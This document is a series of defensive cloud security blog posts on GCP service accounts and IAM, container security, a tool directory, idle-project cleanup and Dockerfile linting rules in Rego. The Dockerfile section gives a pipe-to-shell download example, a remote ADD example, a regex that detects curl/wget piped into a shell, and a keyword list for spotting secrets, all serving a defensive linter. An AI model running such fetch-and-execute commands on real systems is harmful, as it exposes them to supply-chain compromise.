A user managed service account is, surprise, intended to be manually managed. What does this mean?

If you have an application that needs to connect to a cloud service, say a CloudSQL instance, you want to create a Service Account with a proper Role for it.

A good analogy is to see your application as a user: the Service Account is its own dedicated account for Google Cloud, and to authenticate you will then need a “password” that comes in the form of Service Account Key.

Service Account Keys are a json data structure like the following:

{
  "type": "service_account",
  "project_id": "project-id",
  "private_key_id": "key-id",
  "private_key": "-----BEGIN PRIVATE KEY-----\nprivate-key\n-----END PRIVATE KEY-----\n",
  "client_email": "service-account-email",
  "client_id": "client-id",
  "auth_uri": "https://accounts.google.com/o/oauth2/auth",
  "token_uri": "https://accounts.google.com/o/oauth2/token",
  "auth_provider_x509_cert_url": "https://www.googleapis.com/oauth2/v1/certs",
  "client_x509_cert_url": "https://www.googleapis.com/robot/v1/metadata/x509/service-account-email"
}

You can generate as many as you like to be used by your applications to authenticate.

So what’s the problem?

As you have already guessed: if you leak the service account key, the service account can be considered compromised.

And this is so common because secrets distribution usually introduce friction.

There is a non-zero chance that someone in your company is (silently) cutting corners by embedding the json key in their applications and pushing to a public GitHub repository.

Fun fact

Cyber-scoundrels continuously scan public repositories to harvest credentials, it takes on average 10 minutes from committing a key to have someone login with it.

Google Managed Service Account

Google Managed Service Accounts, are SAs for which you don’t need to generate keys and your applications can just assume their identity.

For example Compute Engine comes with a default service account that is associated to all virtual machines (VM) you will provision. Services running on those VMs can use the default service account to authenticate to other cloud services.

No keys are involved: the VM will continuously request short lived authorization tokens from the metadata service. Sweet.

1. Do not use Service Account Keys

The first recommendation is to not use Service Account keys as much as possible.

Using keys implies that you are in charge of their lifecycle and security, and it’s a lot to ask because:

you need a robust system for secrets distribution
you need to implement a key rotation policy
you need to implement safeguards to prevent key leaks

Unless you have a hybrid setup and half your workloads are on prem, it’s just so much easier to use google managed service accounts.

2. Use Google Managed Service Accounts

In fact, the second recommendation is to use google managed service accounts.

Your applications running con Compute Engine can automatically assume the default service account identity.

But, there is a caveat: the default compute engine service account is automatically assigned the role Editor, which is read and write access to everything.

3. Do not use the Default Compute Engine Service Account

Yep. Don’t use the default compute engine service account.

Instead, create a new Service Account and use it as the default account used by a VM. Even better: create one account for each VM.

This will allow you to fine tune the authorization grants (and greatly please the gods of least privilege).

For extra points you can as well disable it with an Organizational Policy:

Service Consumer Management 

Disable Automatic IAM Grants for Default Service Accounts 

This boolean constraint, when enforced, prevents the  [default](https://cloud.google.com/iam/help/service-accounts/default)  App Engine and Compute Engine service accounts that are created in your projects from being automatically granted any IAM role on the project when the accounts are created. 
By default, these service accounts automatically receive the Editor role when they are created. 

constraints/iam.automaticIamGrantsForDefaultServiceAccounts

4. Do not bind Service Account User and Token Creator on the Project IAM

Service Account can be impersonated by other identities, and there are two roles that regulate this behaviour:

Service Account User allow users to indirectly access all the resources to which the service account has access
Service Account Token Creator allow users to directly impersonate a service account

Service account impersonation is a risky behaviour because multiplies the blast radius of a compromised identity.

For this reason bind Service Account User or Token Creator directly on the Service Account IAM policy and never on the Project’s (or Folder’s or - god forbid - the Organization’s)

5. Reduce the Authorization Scopes with IAM Recommender

Continuously enforcing least privilege is auspicable for every kind of identity but for Service Accounts in particular: since they are intended to be used programmatically the risk of compromising one is higher than for a normal account.

Google provides an extremely valuable service: the IAM Recommender. It continuously scan role bindings and suggest changes to reduce the authorization scope.

Use it.

Conclusion

If there is one insight I would like you to get from this post is that Service Account Keys are dangerous and their use should be minimized.

If you are looking for more high level recommendations on Identity and Access Management (IAM) governance in GCP, please refer to my previous article on the topic.

A Practical Introduction to Container Security

Sun, 01 Nov 2020 11:24:54 +0100

Securing containers is a complex task. The problem space is broad, vendors are on fire, there are tons of checklists and best practices and it’s hard to prioritize solutions. So if you had to implement a container security strategy where would you start?

I suggest to start from the basics: understanding what container security is about and build a model to navigate risks.

Follow the DevOps Life Cycle

Every security initiative is eventually constrained by where security controls can be implemented, so I find practical to just follow the standard DevOps life cycle to surface patterns™ and unlock synergies™.

The DevOps Lifecycle is an infinite iteration of:

Plan
Code
Build
Test
Release
Deploy
Operate
Monitor

Containers are included in the application in the form of a Dockerfiles but are not really part of it. As such they don’t interest the planning and coding phase.

(no, writing Dockerfiles is not coding.)

Every other step is in scope from a security point of view, and I would group them like this:

Build Time: build, test and release.
Container Infrastructure: deploy and operate.
Runtime: monitor.

Why? Every security strategy is only effective if it can be implemented. And every step in each group share a common facility where security controls can be injected without adding much friction:

Build Time: The CI/CD infrastructure, the container registry
Container Infrastructure: the container orchestrator
Runtime: the production environment

Now we have three macro areas we can use as a starting point to do our risk assessments.

Security at Build Time

At build time we have in input a bunch of source files and a Dockerfile, and we get as output a Docker image.

This is where most vendors tend to cluster while trying to sell you the narrative of the importance of scanning container images and calling it a day. Container security scanning is important, yes, but it’s not enough.

This stage goal:

minimize the risk of supply chain attacks.

Container Images Hygiene

First, decide how your images should look like, with a focus on how software dependencies are introduced:

what base images are developers allowed to use?
are software dependencies pinned? From where are they pulled?
are there any labels that are needed to simplify governance and compliance?
lint the Dockerfile
follow Docker security best practices when writing Dockerfiles

All of these checks are static and can be implemented for cheap as a step in the build pipelines.

Container Images Scanning

Then we can move into scanning the container image.

Do not scan the image as a step in the build pipeline, instead setup continuous scanning in the container registry.

Why? Vulnerabilities are continuously discovered while your services are not necessarily continuously built. Secondly, builds are additive: every build will generate a new image. So, assuming your container orchestrator trust your registry, every tag you publish can always be deployed and need to be assessed.

(It’s also very slow to scan at build time)

This is where you start thinking about defining patch management and shelf life processes:

patch management: results from the scanning will feed a patching process that will result in a new version of the image
shelf life: unpatched/old/unsafe images are deleted from the registry

(next article will be about how to choose a container scanning solution, if you are facing the dilemma right now feel free to ping me)

Container Infrastructure Security

The container infrastructure is comprised of all the moving parts that are in charge of pulling your images from the registry and run them as containers in production.

It’s mostly going to be the container orchestrator – *cough* kubernetes *cough*.

This stage goals:

Avoid platform misconfigurations with security implications
Minimize the breadth of an attack from a compromised container

Security OF the Infrastructure: Misconfigurations

Container orchestrators are complex, Kubernetes in particular. As of now they fail the promise of DevOps and I think we are still an abstraction layer (or two) away from being a mainstream solution without too much operational overhead.

Every complex platforms is prone to be misconfigured, and this is the part you want to focus on.

You have to threat model your infrastructure to ensure it can’t be abused. This particular thread model should focus on every actor but a compromised container (we will cover that next).

I can’t go into details here, because it really depends on what you are running. For Kubernetes a good starting point for threat modelling is this.

Additionally, if you are not doing it yet, this is also a good argument in favour of using a managed platform: the complexity is reduced if you can leverage a shared responsibility model with your (trusted) provider.

Security IN the infrastructure: Lateral Movements

Next we can talk about what happens when a container is compromised.

You want to minimize the attacker’s ability to move laterally, focusing on these two layers:

The network layer
The Identity and Access management (IAM) layer

The network should not be flat. You can start by brutally segment everything into subnetworks and work your way up to a full fledge service meshes.

On the IAM layer work your way toward having a single identity for each container in order to fine tune the authorization grants. This is particularly important in multi tenant platforms: without granular identities it’s impossible to achieve least privilege.

(Google Kubernetes Engine (GKE) has a nifty feature for this called Workload Identity)

Finally, since they are supposed to be immutable, a wonderful strategy would be to reduce the amount of time containers can run: the window of opportunity for attackers to move laterally and gain persistence is as long as the container running lifetime. Continously shut down and spin up your containers.

And this final consideration allow me to smoothly move into the next area.

Runtime Security

The last piece of the puzzle is the security of your running workloads. At this point most of the hardening is done and here is when we move into the realm of reactive security controls, the grim land of post-fail.

This stage goal:

is to minimize the impact of an attack from a compromised container.

Detection and Incident Response

The best way to control the impact of an attack is to minimize the time between the breach to when the security team is alerted.

Detecting an ongoing breach is another area where vendors are scrambling to find a silver bullet. There are many approaches, most of them will require side cars and/or daemon sets actively monitoring pod’s traffic and system calls.

Most solutions will provide some value but my advice is to start simple and iterate: use your existing SIEM, ingest your platform, application and audit logs.

Incidents will happen, and it’s fine: have an incident response process.

The first bullet point of every post-mortem should be: “how can we detect this quicker next time?” answering will allow you to identify your blind spots, which you can then use to understand what signals you are missing and what makes sense to buy.

Conclusion

Container security is a broad problem and it is not just about scanning images.

This is the model I built and used to reason about container risks and solutions. It’s very high level and of course, as with every model, it’s not necessarily the right one.

We all know that in reality each infrastructure is a snowflake: so start with your own threat model and use this one as an inspiration.

Google Cloud IAM for Security Teams

Sun, 25 Oct 2020 13:40:43 +0100

Identity and Access Management (IAM) is an important piece of the cloud puzzle and it’s usually a source of headaches from a security point of view. Let’s try to give some pointers from a blue team perspective.

If you are a security team that just inherited a bunch of Google Cloud Platform (GCP) accounts, this guide is for you.

Identities and Roles

IAM revolves around the concept of identity: an (authenticated) entity to which authorization grants are applied.

Members

In Google Cloud, identities are called members and are the following:

A User: defined by a Google Account
A Group: defined by a Google Group
A domain: a super group representing all accounts under a gsuite/workspace domain
A Service Account: an account for an application rather than an end user

To make things spicier, there are also two special members that you are going to hate and you want to make sure they will never be used (unless valid business reasons):

allAuthenticatedUsers: a special group comprised of everyone on earth with a google account (yes)
allUser: anyone on the internet, authenticated or not

Pro Tip:

scan your IAM policies and make sure that allAuthenticatedUsers and allUsers are never used
or even better, set up an organizational policy to only allow members from your gsuite/workspace domain

Roles

You assign (bind) a Role to a Member to grant that identity access to a resource. An example role is resourcemanager.projectCreator:

$ gcloud iam roles list
…
---
description: Access to create new GCP projects.
etag: AA==
name: roles/resourcemanager.projectCreator
stage: GA
title: Project Creator
---
…

Roles are a set of permissions grouped together, each one representing a fine grained operation. You can’t assign permissions directly to members.

An example permission would be resource manager.projects.create:

$ gcloud iam roles describe roles/resourcemanager.projectCreator
description: Access to create new GCP projects.
etag: AA==
includedPermissions:
- resourcemanager.organizations.get
- resourcemanager.projects.create
name: roles/resourcemanager.projectCreator
stage: GA
title: Project Creator

Usually, every cloud service will come with a dedicated set of Roles (not for Google Container Registry).

Custom Roles

As a rule of thumb stick to standard roles, but if you have to bind a role to a member in a high level policy you might want to use a custom role. Custom Roles allows you to group together the specific set of permissions you need.

They are helpful to maintain least privilege because a role bind on a high level policy (like the Organization one) will affect way more resources.

Pro Tip:

Use standard roles when the number of affected resources is limited
Use custom roles when the authorization grant affect too many resources

Primitive Roles

There are a bunch of roles you should be wary of: primitive roles. These are Owner, Editor and Viewer. When they are bind on the Project IAM policy they translate to admin, write and read access to everything inside that project.

You want to be wary for two reasons:

The set of permissions change over time: when Google release new cloud services, permissions for such services are included in the primitive roles. This means you have an authorization grant that change over time and you have no control over. No bueno.
They are a bridge to Access Control List (ACL). ACL are the legacy authorization system for some storage services such as Buckets and Bigquery. In such resources you can assign ACL grants to whoever is bind to a primitive role in the Project. This relationship adds complexity when trying to understand the blast radius of a member.

If you can’t escape using a primitive role, bind them to members that you will use only in “break the glass” scenarios. In practice, you don’t want a team doing their day to day operations as Owners.

Pro Tip:

Avoid primitive roles
Do not use Access Control Lists (ACL)

IAM Policies (and where to find them)

Roles are bind to members in an IAM Policy. Policies are organized in hierarchical layers (from top to bottom):

Organization
Folder
Project
Specific Resources.

Bindings will be inherited from top to bottom.

So if you assign Storage Admin to a service account in the Organization IAM Policy, the same grant will be applied to everything down (don’t do that).

You obviously want to be extra careful when binding roles high in the hierarchy as the authorization grant will be quite large. That’s why it’s a good idea to use custom roles to shrink it to just the permissions you need.

Some specific cloud resources, such as Buckets, have their own IAM policy. These are easy to overlook because they don’t have a consistent place in the google cloud admin interface.

The best way to get visibility over all IAM policies is to create a Cloud Asset Inventory (CAI) dump. CAI is, in my opinion, the most useful thing in GCP. It’s an API that will generate a json (or bigquery) dump of all the resources and IAM Policies you are currently running.

The best thing you can do on day one is to set up periodical CAI dumps, and then build your detections on top of them.

Maintain the principle of least privilege

The second best thing is to use the IAM Recommender: a service that monitors how role bindings are actually used to make sure you are not over granting them.

Another helpful trick to know is that you can attach conditions to role bindings. For example you can set an expiration time, or you can scope down the binding to affect only certain resources matching a pattern.

Pro Tip:

The higher in the IAM hierarchy, the wider the scope of the authorization grant: use sporadically, be a gatekeeper.
Set up Cloud Asset Inventory to not miss anything
Use the IAM Recommender
Use IAM Conditions

Notes on Service Accounts

Service accounts can be of two types: google managed and user managed.

A user managed service account is one you manually create. To use it, you need to create a private key and embed it into your application. A service account can have multiple keys.

Service Account keys lifecycle is your responsibility: they never really expires, are hard to audit (you don’t see which key has been used from the audit logs). From day one you should start thinking how to keep track of them.

Personally I am a fan of wrapping keys creation into an internal service for your developers to use, but I understand it’s not always possible.

The best alternative is to use google managed service accounts. For example each project will come with a default service account that is used by Google Compute Engine (GCE) services (if the GCE API is enabled).

This means that virtual machines will transparently be identified by that service account, and they are authorized to request short-lived authorization tokens from the internal metadata service. You can configure them to use a service account of your choice and no keys are involved.

Pro Tip:

Become a gatekeeper for provisioning Service Accounts keys
Use the identity of the virtual machines whenever possible
Are you running Google Kubernetes Engine (GKE)? Take a look at Workload Identity
Follow service accounts best practices

Conclusion

To recap:

scan your IAM policies and make sure that allAuthenticatedUsers and allUsers are never used
or even better, set up an organizational policy to only allow members from your gsuite/workspace domain
Use standard roles when the number of affected resources is limited
Use custom roles when the authorization grant affect too many resources
Avoid primitive roles
Do not use Access Control Lists (ACL)
The higher in the IAM hierarchy, the wider the scope of the authorization grant: use sporadically, be a gatekeeper.
Set up Cloud Asset Inventory to not miss anything
Adhere to the least privilege principle with the IAM Recommender and IAM Conditions
Become a gatekeeper for provisioning Service Accounts keys
Use the identity of the virtual machines whenever possible
Are you running Google Kubernetes Engine (GKE)? Take a look at Workload Identity
Follow service accounts best practices

There is a lot more to say about IAM governance and security best practices. This article’s purpose is to give a high level overview of the main security considerations.

If you are looking for specific advices, let me know. I might have some.

Finally, I highly recommend this fantastic talk by Kat Traxler about primitive roles and IAM quirks in GCP.

A Collection of Cloud Security Tools

Sun, 18 Oct 2020 00:00:00 +0000

I’ve built a directory of open source cloud security tools.

A good part of my day to day is spent trying to automate away problems. Over the years I learned how to invest my time wisely, and I made a habit to research and use available tools before start coding my own.

As a consequence I have a fairly large collection of utilities I keep nurturing, alongside references, commands and debugging adventures.

I thought I could as well make it public, so here we are: check it out.

Every tool has a page were I (will) store my own notes: see my very own docker-security as an example. I am still cleaning up most of them and I will publish a bit per time.

I’ll also commit a more compact version to github.

In the meanwhile if you have some tools to share please do!

aardvark

Sun, 18 Oct 2020 00:00:00 +0000

actionhero

Sun, 18 Oct 2020 00:00:00 +0000

Adaz

Sun, 18 Oct 2020 00:00:00 +0000

AirIAM

Sun, 18 Oct 2020 00:00:00 +0000

aks-checklist

Sun, 18 Oct 2020 00:00:00 +0000

amazon-s3-find-and-forget

Sun, 18 Oct 2020 00:00:00 +0000

attack_range

Sun, 18 Oct 2020 00:00:00 +0000

automated-cloud-advisor

Sun, 18 Oct 2020 00:00:00 +0000

autovpn

Sun, 18 Oct 2020 00:00:00 +0000

aws_exposable_resources

Sun, 18 Oct 2020 00:00:00 +0000

aws_key_triage_tool

Sun, 18 Oct 2020 00:00:00 +0000

aws-auto-remediate

Sun, 18 Oct 2020 00:00:00 +0000

aws-billing-slack-lambda

Sun, 18 Oct 2020 00:00:00 +0000

aws-iam-authenticator

Sun, 18 Oct 2020 00:00:00 +0000

aws-iamctl

Sun, 18 Oct 2020 00:00:00 +0000

aws-incident-response

Sun, 18 Oct 2020 00:00:00 +0000

aws-incident-response-runbooks

Sun, 18 Oct 2020 00:00:00 +0000

aws-lambda-api-call-recorder

Sun, 18 Oct 2020 00:00:00 +0000

aws-recon

Sun, 18 Oct 2020 00:00:00 +0000

aws-s3-virusscan

Sun, 18 Oct 2020 00:00:00 +0000

aws-sso-credential-process

Sun, 18 Oct 2020 00:00:00 +0000

capsule

Sun, 18 Oct 2020 00:00:00 +0000

cdkgoat

Sun, 18 Oct 2020 00:00:00 +0000

cfngoat

Sun, 18 Oct 2020 00:00:00 +0000

chart-testing

Sun, 18 Oct 2020 00:00:00 +0000

cloudformation-guard

Sun, 18 Oct 2020 00:00:00 +0000

cloudkeeper

Sun, 18 Oct 2020 00:00:00 +0000

CloudShell

Sun, 18 Oct 2020 00:00:00 +0000

cloudsplaining

Sun, 18 Oct 2020 00:00:00 +0000

cloudtracker

Sun, 18 Oct 2020 00:00:00 +0000

container-diff

Sun, 18 Oct 2020 00:00:00 +0000

container-scan

Sun, 18 Oct 2020 00:00:00 +0000

CONVEX

Sun, 18 Oct 2020 00:00:00 +0000

copilot-cli

Sun, 18 Oct 2020 00:00:00 +0000

dagda

Sun, 18 Oct 2020 00:00:00 +0000

dast-operator

Sun, 18 Oct 2020 00:00:00 +0000

DefendTheFlag

Sun, 18 Oct 2020 00:00:00 +0000

detection-rules

Sun, 18 Oct 2020 00:00:00 +0000

docker-slim

Sun, 18 Oct 2020 00:00:00 +0000

dockerfile-security

Sun, 18 Oct 2020 00:00:00 +0000

References:

The theory behind each security misconfiguration in Dockerfiles

dockle

Sun, 18 Oct 2020 00:00:00 +0000

dostainer

Sun, 18 Oct 2020 00:00:00 +0000

Dragonfly

Sun, 18 Oct 2020 00:00:00 +0000

gatekeeper

Sun, 18 Oct 2020 00:00:00 +0000

gcp-iam-role-permissions

Sun, 18 Oct 2020 00:00:00 +0000

gimme-aws-creds

Sun, 18 Oct 2020 00:00:00 +0000

gke-auditor

Sun, 18 Oct 2020 00:00:00 +0000

goldpinger

Sun, 18 Oct 2020 00:00:00 +0000

govuk-aws

Sun, 18 Oct 2020 00:00:00 +0000

grype

Sun, 18 Oct 2020 00:00:00 +0000

helm-freeze

Sun, 18 Oct 2020 00:00:00 +0000

http-desync-guardian

Sun, 18 Oct 2020 00:00:00 +0000

iam-policies-cli

Sun, 18 Oct 2020 00:00:00 +0000

infracost

Sun, 18 Oct 2020 00:00:00 +0000

k8s-audit-log-inspector

Sun, 18 Oct 2020 00:00:00 +0000

k8s-diagrams

Sun, 18 Oct 2020 00:00:00 +0000

k8s-snapshots

Sun, 18 Oct 2020 00:00:00 +0000

kconmon

Sun, 18 Oct 2020 00:00:00 +0000

kconnect

Sun, 18 Oct 2020 00:00:00 +0000

kip

Sun, 18 Oct 2020 00:00:00 +0000

konstraint

Sun, 18 Oct 2020 00:00:00 +0000

krane

Sun, 18 Oct 2020 00:00:00 +0000

kube-fluentd-operator

Sun, 18 Oct 2020 00:00:00 +0000

kube-forensics

Sun, 18 Oct 2020 00:00:00 +0000

kube-janitor

Sun, 18 Oct 2020 00:00:00 +0000

kube-prometheus

Sun, 18 Oct 2020 00:00:00 +0000

kubectl-fuzzy

Sun, 18 Oct 2020 00:00:00 +0000

kubectl-images

Sun, 18 Oct 2020 00:00:00 +0000

kubefs

Sun, 18 Oct 2020 00:00:00 +0000

kubei

Sun, 18 Oct 2020 00:00:00 +0000

kuberhealthy

Sun, 18 Oct 2020 00:00:00 +0000

kubernetes-examples

Sun, 18 Oct 2020 00:00:00 +0000

kubernetes-goat

Sun, 18 Oct 2020 00:00:00 +0000

litmus

Sun, 18 Oct 2020 00:00:00 +0000

lsh

Sun, 18 Oct 2020 00:00:00 +0000

opa-image-scanner

Sun, 18 Oct 2020 00:00:00 +0000

PowerZure

Sun, 18 Oct 2020 00:00:00 +0000

professional-services

Sun, 18 Oct 2020 00:00:00 +0000

rego-policies

Sun, 18 Oct 2020 00:00:00 +0000

regula

Sun, 18 Oct 2020 00:00:00 +0000

rode

Sun, 18 Oct 2020 00:00:00 +0000

secrets-store-csi-driver-provider-azure

Sun, 18 Oct 2020 00:00:00 +0000

SFPolDevChk

Sun, 18 Oct 2020 00:00:00 +0000

SimuLand

Sun, 18 Oct 2020 00:00:00 +0000

sinker

Sun, 18 Oct 2020 00:00:00 +0000

SkyArk

Sun, 18 Oct 2020 00:00:00 +0000

spacesiren

Sun, 18 Oct 2020 00:00:00 +0000

starboard

Sun, 18 Oct 2020 00:00:00 +0000

starboard-octant-plugin

Sun, 18 Oct 2020 00:00:00 +0000

stash

Sun, 18 Oct 2020 00:00:00 +0000

Stormspotter

Sun, 18 Oct 2020 00:00:00 +0000

syft

Sun, 18 Oct 2020 00:00:00 +0000

synator

Sun, 18 Oct 2020 00:00:00 +0000

talisman

Sun, 18 Oct 2020 00:00:00 +0000

terragoat

Sun, 18 Oct 2020 00:00:00 +0000

trailscraper

Sun, 18 Oct 2020 00:00:00 +0000

tunshell

Sun, 18 Oct 2020 00:00:00 +0000

vector

Sun, 18 Oct 2020 00:00:00 +0000

version-checker

Sun, 18 Oct 2020 00:00:00 +0000

whalescan

Sun, 18 Oct 2020 00:00:00 +0000

whispers

Sun, 18 Oct 2020 00:00:00 +0000

How to find and delete idle GCP Projects

Sun, 11 Oct 2020 11:15:51 +0200

A constant source of pain in Google Cloud Platform (GCP) and everywhere else is the amount of unmaintained resources: idle virtual machines, old buckets, IAM policies, DNS records and so on. They contribute to the attack surface and the chance of a vulnerability increase with time.

Shutting off resources is a such a low hanging fruit from a risk perspective that as a security engineer you should make it a daily habit.

After all the most secure computer is the one that’s been turned off!

How to find the cruft

The bigger and complex a cloud infrastructure becomes, the harder it gets to find unmaintained stuff.

Having an inventory system in place, as early as possible, would prevent so many headaches but even the most enlightened leadership will have a hard time justifying the investment.

Eventually the problem will outgrow security and spill into other areas such as cloud spending (gasp!): that’s when everyone will start talking about inventories, accountability and resources lifecycle.

Until then how to find things to kill?

Start with the Projects. The GCP model encourages the segmentation of the infrastructure logical areas into Projects, and a lot of audit facilities are aggregated on that level. (Obviously Projects will also silently introduces cost multipliers such as VPCs but we will leave this for another rant.)

There are three sources one can query:

Activity Logs
Billing Reports
IAM Policies

Use these three and you can build your own personal heuristic that will answer the question: can I kill this?

Activity Logs

Events that change state and configuration of cloud services are collected in the Admin Activity and System Event audit logs.

While they both track configuration changes only the Admin Activity is the one that tracks manual changes driven by direct user action: creation of resources, change of IAM policies, etc.

The retention is ~400 days and I would check the frequency of these log entries to understand if services were being configured recently.

Usually an active project implies an active administrator.

Billing Reports

We can query the billing account(s) to get a per project cost/usage report.

If the cost graph is flat that could be an indicator that the project is idling. In contrast plotting an active project’s cost will results in a bumpy curve as buckets will fill up, logs will be generated and resources will be add and removed over time.

It’s worth keeping in mind that we can also get usage reports for Compute Engine services. It’s mostly a data point about the lifecycle of resources rather than their usage - but can still contribute to our killer algorithm.

IAM Policies

Nobody knows a project better than its owner, so we can’t go wrong if we ask politely. The problem is finding that person.

The solution is to scrape the IAM policy. I’d start by searching role bindings for Owner, Editor or Viewer as they are the basic roles in GCP.

If we are lucky we will get a Group or a User’s email.

If we get a Service Account (SA) we can investigate it. When a SA is bind with a basic role, 99% of the time it’s been created in another project. So we can recursively scrape that project’s IAM and keep going until we find a human.

Look ma, no influencing skills

There are two things I learned the hard way as a security artisan:

Do not kill stuff without asking first
Do not flood people with alerts

As such my cruft hunting algorithm is called can_I_MAYBE_kill_this() and works like this:

I combine billing reports and admin activity logs to figure out if the project is idle since a while. I want to rule out projects that are obviously active.
I scrape the IAM policy and find potential owners.
I send them an email asking who is the technical contact for the project because I need to talk to them about a security situation. The combination of asking for someone accountable and mentioning security usually trigger a game of hot potato that ends with the project killed.
If I get no answer, I nudge that I will delete the project in X days. This is the part where is self reflect on how I ended up threatening good people for a living and I manually check the project again to find more evidence.
I delete the project.

Note that deleting a project will trigger a soft deletion, this means you have 30 days to change your mind before resources are actually decommissioned (although Cloud Storage services get decommissioned faster, usually ~ a week).

Conclusion

The take away is that finding and shutting down idle cloud resources is not straightforward and can’t be solved with a cron job.

Shut down other people’s resources at your risk and peril: be nice, ask, nudge and implore them to take care of their things.

Keep track of every time you have to track down owners. Make accountability and resource lifecycle a chapter of your threat model and build a case to lobby for an inventory system.

If you have someone in charge of keeping track of spending go and talk to them: change is never introduced in isolation, and there isn’t anything better than mixing cost savings and security to get ~~a budget~~ attention.

Happy hunting.

Docker Security Best Practices from the Dockerfile

Sun, 04 Oct 2020 23:32:41 +0200

Docker and container security are broad problem spaces and there are many low hanging fruits one can harvest to mitigate risks. A good starting point is to follow some best practices when writing Dockerfiles.

I’ve compiled a list of common docker security issues and how to avoid them. For every issue I’ve also written an Open Policy Agent (OPA) rule ready to be used to statically analyze your Dockerfiles with conftest. You can’t shift more left than this!

You can find the .rego rule set in this repository. I appreciate feedback and contributions.

1. Do not store secrets in environment variables

The first docker security issue to prevent is including plaintext secrets in the Dockerfile.

Secrets distribution is a hairy problem and it’s easy to do it wrong. For containerized applications one can surface them either from the filesystem by mounting volumes or more handily through environment variables.

Unfortunately using ENV to store tokens, password or credentials is a bad practice: because Dockerfiles are usually distributed with the application, so there is no difference from hard coding secrets in code.

How to detect it:

secrets_env = [
    "passwd",
    "password",
    "pass",
 #  "pwd", can't use this one   
    "secret",
    "key",
    "access",
    "api_key",
    "apikey",
    "token",
    "tkn"
]

deny[msg] {    
    input[i].Cmd == "env"
    val := input[i].Value
    contains(lower(val[_]), secrets_env[_])
    msg = sprintf("Line %d: Potential secret in ENV key found: %s", [i, val])
}

2. Only use trusted base images

Another common docker security issue is the hight risk of supply chain attacks.

For containerized applications this kind of risk is introduced from the hierarchy of layers used to build the container itself.

The main culprit is obviously the base image used. Untrusted base images are a high risk and whenever possible should be avoided.

Docker provides a set of official base images for most used operating systems and apps. By using them, we increase the security of our Docker containers by leveraging some sort of shared responsibility with Docker itself.

How to detect it:

deny[msg] {
    input[i].Cmd == "from"
    val := split(input[i].Value[0], "/")
    count(val) > 1
    msg = sprintf("Line %d: use a trusted base image", [i])
}

This rule is tuned towards DockerHub’s official images. It’s very dumb since I’m only detecting the absence of a namespace.

The definition of trust depends on your context: change this rule accordingly.

3. Do not use ‘latest’ tag for base image

Pinning the version of your base images will give you some peace of mind with regards to the predictability of the containers you are building.

If you rely on latest you might silently inherit updated packages that in the best worst case might impact your application reliability, in the worst worst case might introduce a vulnerability.

How to detect it:

deny[msg] {
    input[i].Cmd == "from"
    val := split(input[i].Value[0], ":")
    contains(lower(val[1]), "latest"])
    msg = sprintf("Line %d: do not use 'latest' tag for base images", [i])
}

4. Avoid curl bashing

Pulling stuff from internet and piping it into a shell is as bad as it could be. Unfortunately it’s a widespread solution to streamline installations of software.

wget https://cloudberry.engineering/absolutely-trustworthy.sh | sh

The risk is the same framed for supply chain attacks and it boils down to trust. If you really have to curl bash, do it right:

use a trusted source
use a secure connection
verify the authenticity and integrity of what you download

How to detect it:

deny[msg] {
    input[i].Cmd == "run"
    val := concat(" ", input[i].Value)
    matches := regex.find_n("(curl|wget)[^|^>]*[|>]", lower(val), -1)
    count(matches) > 0
    msg = sprintf("Line %d: Avoid curl bashing", [i])
}

5. Do not upgrade your system packages

This might be a bit of a stretch but the reasoning is the following: you want to pin the version of your software dependencies, if you do apt-get upgrade you will effectively upgrade them all to the latest version.

If you do upgrade and you are using the latest tag for the base image, you amplify the unpredictability of your dependencies tree.

What you want to do is to pin the base image version and just apt/apk update.

How to detect it:

upgrade_commands = [
    "apk upgrade",
    "apt-get upgrade",
    "dist-upgrade",
]

deny[msg] {
    input[i].Cmd == "run"
    val := concat(" ", input[i].Value)
    contains(val, upgrade_commands[_])
    msg = sprintf(“Line: %d: Do not upgrade your system packages", [i])
}

6. Do not use ADD if possible

One little feature of the ADD command is that you can point it to a remote url and it will fetch the content at building time:

ADD https://cloudberry.engineering/absolutely-trust-me.tar.gz

Ironically the official docs suggest to use curl bashing instead.

From a security perspective the same advice applies: don’t. Get whatever content you need before, verify it and then COPY. But if you really have to, use trusted sources over secure connections.

Note: if you have a fancy build system that dynamically generate Dockerfiles, then ADD is effectively a sink asking to be exploited.

How to detect it:

deny[msg] {
    input[i].Cmd == "add"
    msg = sprintf("Line %d: Use COPY instead of ADD", [i])
}

7. Do not root

Root in a container is the same root as on the host machine, but restricted by the docker daemon configuration. No matter the limitations, if an actor breaks out of the container he will still be able to find a way to get full access to the host.

Of course this is not ideal and your threat model can’t ignore the risk posed by running as root.

As such is best to always specify a user:

USER hopefullynotroot

Note that explicitly setting a user in the Dockerfile is just one layer of defence and won’t solve the whole running as root problem.

Instead one can — and should — adopt a defence in depth approach and mitigate further across the whole stack: strictly configure the docker daemon or use a rootless container solution, restrict the runtime configuration (prohibit --privileged if possible, etc), and so on.

How to detect it:

any_user {
    input[i].Cmd == "user"
 }

deny[msg] {
    not any_user
    msg = "Do not run as root, use USER instead"
}

8. Do not sudo

As a corollary to do not root, you shall not sudo either.

Even if you run as a user make sure the user is not in the sudoers club.

deny[msg] {
    input[i].Cmd == "run"
    val := concat(" ", input[i].Value)
    contains(lower(val), "sudo")
    msg = sprintf("Line %d: Do not use 'sudo' command", [i])
}

Conclusion

Docker security, or container security in general, is tricky and there are many solutions to minimize risks.

In this article I demonstrated how to tackle the problem from the build phase, by setting up a simple security linter for Dockerfiles. If you wish to learn more you might find my introduction to container security informative.

Thanks for reading!

Acknowledgements

This work has been inspired and is an iteration on prior art from Madhu Akula.

Shared Responsibility Models for Public Clouds

Sat, 26 Sep 2020 00:00:00 +0200

Public cloud providers share some security responsibility with their customers. This means that as a security practitioner, what you should take into account in your threat model is going to be different in the cloud than on premise environments.

The concept of Shared Responsibility

If you were to operate a colocated machine in a datacenter — or a whole datacenter — you would be responsible for the security of it: from the very bottom of the physical stack (“who can touch the machines”) to the physical networking, up to the staircase of infinite software abstraction layers.

The cloud removes a lot of the hassle, since you are practically renting computing resources from someone else. This means your provider will take care of a lot of things for you and the higher you are in the As A Service stack, the less stuff you are responsible for.

In short the provider is resposible for the security of their clouds, while you will be responsible for the security in their cloud.

IaaS, PaaS and SaaS

In practice on the Infrastructure as a Service (IaaS) layer boundaries are sharp: you get a virtual machine and you are in charge of what to run on it.

As soon as we step in the Platform as a Service (SaaS) layer things gets fuzzier. Every platform service is a snowflake: to abstract away as much infrastructure as possible, things have to be opinionated and some configuration decisions are taken for you (and the provider is responsible for them) while for others you have the freedom to mess things up.

Finally in the Software as a Service (SaaS) layer the situation gets calmer again: it’s mostly about how to authenticate and authorize identities.

What you should care about

So as a security engineer what should you care about?

I don’t have a direct answer because — as everything in security — it depends.

